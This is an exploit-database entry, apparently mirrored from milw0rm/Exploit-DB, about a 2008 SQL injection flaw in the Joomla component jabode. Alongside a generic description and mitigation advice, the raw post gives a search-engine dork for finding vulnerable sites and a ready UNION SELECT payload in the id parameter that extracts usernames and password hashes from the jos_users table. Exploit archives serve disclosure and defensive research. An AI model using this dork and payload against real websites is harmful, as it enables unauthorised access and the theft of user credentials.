Joomla Component jabode Remote SQL injection

vendor:

Joomla Component jabode

by:

His0k4

7.5

CVSS

HIGH

Remote SQL injection

CWE

Product Name: Joomla Component jabode

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

Joomla Component jabode Remote SQL injection

This exploit allows an attacker to perform a remote SQL injection attack in the Joomla Component jabode. The vulnerability can be exploited by sending a specially crafted request to the target Joomla website, which can lead to unauthorized access or disclosure of sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the Joomla Component jabode or apply any available patches. Additionally, website administrators should regularly monitor their websites for any unauthorized access or suspicious activities.

Source

Exploit-DB raw data:

/---------------------------------------------------------------\
\                                				/
/       Joomla Component jabode Remote SQL injection            \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_jabode

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users--

[*] Funny note:  You can change "taurus" to your sign for best results xd...

                
----------------------------------------------------------------------------
[*] Greetings :  All friends & muslims HaCkeRs...
[*] Greetings2:  http://www.dz-secure.com
                 http://palcastle.org/cc

# milw0rm.com [2008-06-28]